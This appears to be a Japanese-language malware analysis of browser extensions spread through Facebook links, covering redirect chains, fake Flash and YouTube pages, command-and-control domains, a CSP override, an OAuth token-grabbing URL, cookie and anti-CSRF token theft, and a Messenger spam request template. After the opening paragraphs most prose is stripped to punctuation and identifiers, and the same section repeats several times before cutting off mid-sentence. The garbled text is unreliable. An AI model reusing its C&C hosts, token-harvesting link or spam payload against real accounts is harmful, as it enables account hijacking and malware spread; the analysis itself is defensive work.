メディアの報道によると 、Facebookはこの脅威に対処し、悪意のあるメッセージの拡散をブロックしました。 しかし、後に多くの悪意のあるリンクのさらなる広がりを発見し、Yandex.Browserユーザーを保護するためにこの攻撃がどのように機能するかを解明することにしました。
メディアによると、その原因はChromeブラウザーの悪意のあるYouTurn拡張機能であり、ユーザーは感染した友人から受け取ったリンクをクリックするとインストールするように求められます。 しかし、この感染の一部としていくつかの拡張機能が使用されていることがわかりました。 ちなみに、YouTurnは12月16日に既にChromeStoreから削除されています。

それらはすべて同様に配置されていましたが、Facebookページに類似し、Amazon S3でホストされているフィッシングリソースを介して、異なる名前で異なるタイミングで配布されました。 興味深いことに、配信メカニズムに加えて、疑わしいコンテンツを含むバナー広告をすべてのブラウザータブに読み込み、FacebookがブロックしたIDを持つ内部アプリケーションへの感染ユーザーのアカウントへのアクセスを提供しました。
それで、この「ウイルス」はそれほど無害だったのでしょうか。
マルウェアの分布パターンの分析
いずれの場合も、悪意のあるリンクはさまざまな短縮サービスを使用して生成され、それに切り替えると、ユーザーはサーバーリダイレクトのチェーンに沿って送信されました。次に例を示します。
goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE=
goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE=
、
最終的な宛先は、dropboxusercontent.comのWebページでした。 それには、非常に単純なjsスクリプトが含まれていました。その主な機能は、ブラウザオブジェクトの「ナビゲータ」をチェックし、その値に応じてリダイレクトを実行することでした。 モバイルユーザーとIEユーザーはteladea.blogspot.comにリダイレクトされました。teladea.blogspot.comには13日金曜日の映画のパロディと赤十字ウェブサイトへのリンクが含まれていました 。

Firefoxユーザーがリンクによってスクリプトをリダイレクト
video51828.s3-website-us-west-2.amazonaws.com/mf39.html
video51828.s3-website-us-west-2.amazonaws.com/mf39.html
、およびChromeのリンクに続くものは
video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html
video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html
、ナビゲーターで「Facebook-bot」サブストリングを持つユーザーはGoogleにリダイレクトされました。

ランディングページコード
Firefoxユーザー向けのWebページ(
video51828.s3-website-us-west-2.amazonaws.com/mf49.html
video51828.s3-website-us-west-2.amazonaws.com/mf49.html
)はYouTubeに偽装されました(Webコンテンツは主にjsを介して生成されました)。 ユーザーがAndroidプラットフォームに基づくモバイルデバイスからこのページにアクセスした場合、s.html Webページへのリダイレクトが実行されましたが、これは分析時には利用できなくなりました。 ブラウザがデスクトップの場合、ビデオではなくページに、FlashPlayerを表示するには更新する必要があるというメッセージが表示されました。 完全なコードはここで見ることができます 。

「プレーヤーの更新」ボタンをクリックすると、「PremiumCodec」ブラウザーの拡張機能がFirefoxブラウザーにインストールされ、リンクによってダウンロードされました
premiumd1.mzzhost.com/premiumD.xpi
premiumd1.mzzhost.com/premiumD.xpi
。 Firefoxが拡張機能をインストールするために追加の許可を必要とするのは興味深いことですが、攻撃者はこの瞬間を考慮に入れ、jsコードを使用してプレーヤーの更新をクリックした後、インストールを許可するためにクリックするポインターを含む画像を表示する追加のコードを作成しました。
拡張機能は、コードの実行時に直接インストールされました。
top["location"] = premiumd1.mzzhost.com/premiumD.xpi.
ページ上に直接配置された難読化されたjsスクリプトは、この機能を担当していました。

FireFoxの難読化解除された拡張機能インストールコードのフラグメント
拡張機能の分析は、投稿の関連セクションで以下に示されています。
Chromeユーザー向けのWebページ(http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html)もフィッシングであり、Facebookになりすまそうとしました。 そのコンテンツもjavascriptを使用して生成されました。

完全なページコードはこちらにあります 。
ビデオのある領域をクリックすると、ユーザーがプレーヤーを見つけられなかったことが知らされ、この厄介な欠点を補うためにブラウザに特別な拡張機能をインストールすることが提案されました。 私たちの場合、それはchrome.webstore.install jsエンジンを使用してChromeウェブストアからインストールされたYouTube Now拡張機能(id akmghomonnhljmlfemmifjblglkacfhg)でした。

難読化解除された拡張機能インストールスクリプトのフラグメント

Chromeウェブストアのアプリケーションページ
拡張機能のソースは、配布元のAmazon S3ウェブサイトアドレスと同じでした。
Firefoxの拡張分析
拡張機能はいくつかのファイルで構成され、Crossbrowser.comプラットフォームに基づいて構築されましたが、非常にシンプルな機能を備えていました。 ブラウザの開いているすべてのタブにスクリプトを挿入しました
adeaditi.info/kmain.js
新しいタグを追加して
adeaditi.info/kmain.js
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .

PremiumCodec

adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js

main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.

ld.js
callback- . , url “devtools://”, , ajax-
bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,
uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .

qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .

URL
bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-
www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .
facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.

20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday

uygulamaizinver()
ajax-, html, , action .
duzenlevegonder()
, , ,
duzenlevegonder()
.

Facebook , , . . .
, facebook.com, ,
babasker()
,
bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .
qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json
benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .

id
localStorage okanxxxxss2 + 11e4,
babasker()
.
, Firefox. , .

, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
